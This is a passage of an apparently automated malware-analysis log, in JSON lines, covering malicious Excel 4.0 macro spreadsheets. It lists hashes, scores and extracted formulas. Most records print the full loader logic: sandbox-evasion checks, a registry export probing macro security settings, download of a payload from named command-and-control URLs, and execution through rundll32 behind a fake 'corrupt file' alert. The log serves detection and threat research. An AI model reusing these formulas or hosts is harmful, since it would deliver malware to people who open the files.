Macro","attr":{"formulas":"RETURN()\nRETURN()\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"18ceb521e7919ed775d7747b9c28324f62b5c6f902346babdf6654de0847ee04"},"analysis":{"reported":"2020-04-09T16:15:06Z","score":10,"tags":["macro"]},"signatures":[{"name":"Suspicious Office macro","score":8,"tags":["macro"],"yara_rule":"office_macro_on_action","desc":"Office document macro which triggers in special circumstances - often malicious."}],"files":[{"filename":"18ceb521e7919ed775d7747b9c28324f62b5c6f902346babdf6654de0847ee04","filesize":709120,"md5":"97881a823b5c7ac49ba8b4c7cd3e7078","sha1":"2f7dd31ac8870c48fbad7e8fc84434771e97ba31","sha256":"18ceb521e7919ed775d7747b9c28324f62b5c6f902346babdf6654de0847ee04","sha512":"8cd401782e30dd381ce27122d3930ce01d10ab595443f03b1c407cf6b431f67980b9da5865c76035a62af8fcbc88d4ade1e6f8232cd28fbacf6cfb438fe205d8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"18ceb521e7919ed775d7747b9c28324f62b5c6f902346babdf6654de0847ee04.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"HYPERLINK(\"http://a.hiphotos.baidu.com/album/pic/item/29381f30e924b89927f5c2f46e061d950b7bf635.jpg\",\"\")\nHYPERLINK(\"http://a.hiphotos.baidu.com/album/pic/item/29381f30e924b89927f5c2f46e061d950b7bf635.jpg\",\"\")\nLEFT(SUBSTITUTE(SUBSTITUTE(SUBSTITUTE(\"118.244.78.30 s.taobao.com indivual line. Tdss individual line|118.244.78.30 tao.etao.com indivual line. The IP addss individress |118.244.78.30 s.etao.com indivuale I|118.244.78.30     search.paipai.com          # source server |118.244.78.30     search1.paipai.com              # x client hostl line. Th|118.244.78.30       tmall.com|ndivual line. Tdss individual line. The IP |com indivual line. Tdss individual li|com indivual line. Tdss individual line|divual line. Tdss individual line. The IP }j]=[k{m indivual line. Tdss individual line. The IP k|obo.com indivual line. Tdss individual line. The I|ao.com indivual line. Tdss individual line. The IP }m]=[n{obo.com indivual line. Tdss individual line. The IP \",\"|\",\"\n\"),\"[{\",),\"}]\",),1)\nSUBSTITUTE(SUBSTITUTE(SUBSTITUTE(\"118.244.78.30 s.taobao.com indivual line. Tdss individual line|118.244.78.30 tao.etao.com indivual line. The IP addss individress |118.244.78.30 s.etao.com indivuale I|118.244.78.30     search.paipai.com          # source server |118.244.78.30     search1.paipai.com              # x client hostl line. Th|118.244.78.30       tmall.com|ndivual line. Tdss individual line. The IP |com indivual line. Tdss individual li|com indivual line. Tdss individual line|divual line. Tdss individual line. The IP }j]=[k{m indivual line. Tdss individual line. The IP k|obo.com indivual line. Tdss individual line. The I|ao.com indivual line. Tdss individual line. The IP }m]=[n{obo.com indivual line. Tdss individual line. The IP \",\"|\",\"\n\"),\"[{\",),\"}]\",)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"18f56c442b529db72f75419adb80fa639ae26a3173b93c3c41546a8d1965fe30"},"analysis":{"reported":"2020-04-09T16:15:06Z","score":10},"files":[{"filename":"18f56c442b529db72f75419adb80fa639ae26a3173b93c3c41546a8d1965fe30","filesize":209920,"md5":"d2b67de30e74fbd5a3188416c43c9df5","sha1":"c24140b752193c9d9ef9fba99c1349ffdd105f08","sha256":"18f56c442b529db72f75419adb80fa639ae26a3173b93c3c41546a8d1965fe30","sha512":"3e559c782e6f4f2bcd25963511a3d10e3e4037584d78c2395355f435057010a3bc2415a97357712cb78240a21dcfcd63172ce125caea461ba1c2ab6ccedc838e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"18f56c442b529db72f75419adb80fa639ae26a3173b93c3c41546a8d1965fe30.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"emypgQ9UvD\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"18fbf8bc37c9c06f4d61f38843346f047b0284128633ccccd0d10cb5ffdb68bc"},"analysis":{"reported":"2020-04-09T16:15:06Z","score":10},"files":[{"filename":"18fbf8bc37c9c06f4d61f38843346f047b0284128633ccccd0d10cb5ffdb68bc","filesize":185344,"md5":"66f4bfbed972cad4583a817216a1cb7b","sha1":"c344ecf65da5813bcde856bfe2bf4e09f981a3d5","sha256":"18fbf8bc37c9c06f4d61f38843346f047b0284128633ccccd0d10cb5ffdb68bc","sha512":"6362354e5bde2240f8e5d5afe1a08bcf7f163d4cfe209908a57dd9dc858acf3b001ba728cb7f8bf495cc73ffa47bfad1c8f495217233e3ed40d7c10bdff07d50","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"18fbf8bc37c9c06f4d61f38843346f047b0284128633ccccd0d10cb5ffdb68bc.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/DSKVJBdsj2"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1902f813cb613847c9a6adf469d1e9030c957b826939346afc15974fd3785ddb"},"analysis":{"reported":"2020-04-09T16:15:06Z","score":10},"files":[{"filename":"1902f813cb613847c9a6adf469d1e9030c957b826939346afc15974fd3785ddb","filesize":116224,"md5":"3f22b68ec3b826d3fa2ba957d22fcf98","sha1":"20c38f4572797c121c7a9d45b110b53b1c40b905","sha256":"1902f813cb613847c9a6adf469d1e9030c957b826939346afc15974fd3785ddb","sha512":"cd8484a9e923b7c55b7a85c5dcb1d96ac001e3b9f417f1e24c5e6ae6f52dcb3234ee57d31bdd91e8bf0c1ccc6410be4431278024f504415b95171dc9e714c80a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1902f813cb613847c9a6adf469d1e9030c957b826939346afc15974fd3785ddb.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"teWCL7vcxY\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1905185aba7ef7fc54b469a6c42169b231ac976a603c78f48856665a707a791d"},"analysis":{"reported":"2020-04-09T16:15:06Z","score":10},"files":[{"filename":"1905185aba7ef7fc54b469a6c42169b231ac976a603c78f48856665a707a791d","filesize":152576,"md5":"b294ea8aa0d827d4e5416a56822328e3","sha1":"8ca90bb8666cf12d0faa40ad0c10ebb5302a52d9","sha256":"1905185aba7ef7fc54b469a6c42169b231ac976a603c78f48856665a707a791d","sha512":"8941340cd59d599712db63556c93f64f602a2476c2d12c4e7b57465a35f18cd2681b8715fcb6d0420b8e6759b81cd5da0aed20de7c9ff116389d2d882ad5dfe4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1905185aba7ef7fc54b469a6c42169b231ac976a603c78f48856665a707a791d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"IzHXx8dkgJ\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1929626d1b60343c0c543a9e3047fb297728a0090b22e352242d842e04177ab1"},"analysis":{"reported":"2020-04-09T16:15:06Z","score":10},"files":[{"filename":"1929626d1b60343c0c543a9e3047fb297728a0090b22e352242d842e04177ab1","filesize":185344,"md5":"c878f9d1d3087895c05573074b310208","sha1":"b0b193bd166ff0ce39df0df5c11302a51a175fcc","sha256":"1929626d1b60343c0c543a9e3047fb297728a0090b22e352242d842e04177ab1","sha512":"832e32358713a9f04fa56dfd980ceb53cb140241013634f248a32e27f341953f9fcf807758fc2757195d11e257b735938c08cbcdb14f2da9359bf34eb18a0819","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1929626d1b60343c0c543a9e3047fb297728a0090b22e352242d842e04177ab1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"193b1852fc580337627df3f18db132896baf0e71c046c3d4abbbbd9428c3aaa7"},"analysis":{"reported":"2020-04-09T16:15:06Z","score":10},"files":[{"filename":"193b1852fc580337627df3f18db132896baf0e71c046c3d4abbbbd9428c3aaa7","filesize":226304,"md5":"3a460ebf85ad81de2949497ddf6d500f","sha1":"71d251e6f21ea602adb0af3e1f175f6dd8342d11","sha256":"193b1852fc580337627df3f18db132896baf0e71c046c3d4abbbbd9428c3aaa7","sha512":"e86579f79038466e1a9f1d03441c487419f35422428749b0c12593397c817d0a4bf3f62770f5817fd30bcfc768d722ed3efceb93459520acc302749e9ec5565e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"193b1852fc580337627df3f18db132896baf0e71c046c3d4abbbbd9428c3aaa7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ddfspwxrb.club/fb2g424g"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"AX42kPo3bz\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"193b93eab5698ebd853166002c83350bddbdbae4e15ff5302e8d447cbab5be02"},"analysis":{"reported":"2020-04-09T16:15:06Z","score":10},"files":[{"filename":"193b93eab5698ebd853166002c83350bddbdbae4e15ff5302e8d447cbab5be02","filesize":209920,"md5":"474678497be777de6117081a57e4c430","sha1":"7124ae9e3e0f66bba3c481fa26dcfd49f84f251d","sha256":"193b93eab5698ebd853166002c83350bddbdbae4e15ff5302e8d447cbab5be02","sha512":"968780f4c08c40b173d75653bdc72d17f937c695cbc1dc0706578184bfb70e6f51559a396824bf30961bcb3d8439d00863fcd09340b0fa6cd87ec064d1324905","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"193b93eab5698ebd853166002c83350bddbdbae4e15ff5302e8d447cbab5be02.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"FHWNXcohZO\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"195517b2abcfae338c212b96c174490c5ee7c934609146b2e5cbccde7ebb89fe"},"analysis":{"reported":"2020-04-09T16:15:06Z","score":10},"files":[{"filename":"195517b2abcfae338c212b96c174490c5ee7c934609146b2e5cbccde7ebb89fe","filesize":206336,"md5":"53e580cfd756f59dbf2d066c103227b2","sha1":"cdc348e380c759507830df3c3d4a95a247b42867","sha256":"195517b2abcfae338c212b96c174490c5ee7c934609146b2e5cbccde7ebb89fe","sha512":"1bdae0cdff43ff63403fb1227915a3a091c31652163811e4750f9609b4db6eb1a2337187026a982e33131ced8957bbc02b6a58a71715229e94563e2ea4d1b9a7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"195517b2abcfae338c212b96c174490c5ee7c934609146b2e5cbccde7ebb89fe.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"D8z1QgQ4jr\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"196c3fa67812144f5abd7c1b9971436ff9855024db3f64ed857db7878bfaa566"},"analysis":{"reported":"2020-04-09T16:15:07Z","score":10},"files":[{"filename":"196c3fa67812144f5abd7c1b9971436ff9855024db3f64ed857db7878bfaa566","filesize":160768,"md5":"ff3033a6148e7c076f657b278dc72620","sha1":"74dc25aa413237718c29aa3f071ccab586bf1b0d","sha256":"196c3fa67812144f5abd7c1b9971436ff9855024db3f64ed857db7878bfaa566","sha512":"6dd5a405032a360866e92a1a65a98fc62346ecb03d690afaa41c5f6ee9d3b877cfacfd9248c43f22175dad845cdcffc3dda485740d44a5ef3d8adf9a7dfacb30","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"196c3fa67812144f5abd7c1b9971436ff9855024db3f64ed857db7878bfaa566.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ZcMNy0B3np\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"198380ced34270d921ba97baa3a5a3d49f940a0af1842323e2941ca8d443b55f"},"analysis":{"reported":"2020-04-09T16:15:07Z","score":10},"files":[{"filename":"198380ced34270d921ba97baa3a5a3d49f940a0af1842323e2941ca8d443b55f","filesize":209920,"md5":"99892cfee63a797adcb32b7aae9beca1","sha1":"ee7871403e54f2e098926439dbc9b7a28164446f","sha256":"198380ced34270d921ba97baa3a5a3d49f940a0af1842323e2941ca8d443b55f","sha512":"6594be505e3b4a9136a0b957a825a9c57c3b93c791b1de1ff791900264d95219e232863fe81b269d151da3e46062c5c02fe82e888ee9047f3f805d9d3c5d1305","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"198380ced34270d921ba97baa3a5a3d49f940a0af1842323e2941ca8d443b55f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"9b9W531MH8\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"199157e5cc404cfe0b73c9bbc15d21498d762f270776f9f48a19e7aed56a11a9"},"analysis":{"reported":"2020-04-09T16:15:07Z","score":10},"files":[{"filename":"199157e5cc404cfe0b73c9bbc15d21498d762f270776f9f48a19e7aed56a11a9","filesize":167936,"md5":"85ada904729aeb3269e6a9f4f0f5ad0f","sha1":"77be7c560c9fe4ff9e4d1407eb30ea3daab12a68","sha256":"199157e5cc404cfe0b73c9bbc15d21498d762f270776f9f48a19e7aed56a11a9","sha512":"7876be85d02e77c5a5c0d715aa3f8ceb1f37838495f89cd659982405ba881c0ae4e6c2b9c6227783047cc56cec50ec659213fd0f5c22b92909ace4570b0f63bf","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"199157e5cc404cfe0b73c9bbc15d21498d762f270776f9f48a19e7aed56a11a9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"SgTW6f5vmc\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"199440df01a4181d749082824badd248e0ce705bd917e02644625590dfe2b4c7"},"analysis":{"reported":"2020-04-09T16:15:07Z","score":10},"files":[{"filename":"199440df01a4181d749082824badd248e0ce705bd917e02644625590dfe2b4c7","filesize":214016,"md5":"3ede7f6f55336a80a82c4dfdbd16fb56","sha1":"d7763c139f72aba095d1c5bf70f1bb04104f597b","sha256":"199440df01a4181d749082824badd248e0ce705bd917e02644625590dfe2b4c7","sha512":"13ba9b3ac8a40d9958a7b401a5de89afbe227a9cf09389b7b4a63b6e883f9ffe23861c5214c759b3dfd71a2aef1bb060e85cc563c5132545a6635d681f58b0df","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"199440df01a4181d749082824badd248e0ce705bd917e02644625590dfe2b4c7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv42g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv42g\",\"c:\\Users\\Public\\bug65ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"vcr8iFUhBe\",TRUE)\nGOTO(R$0C$18)"}}}]}
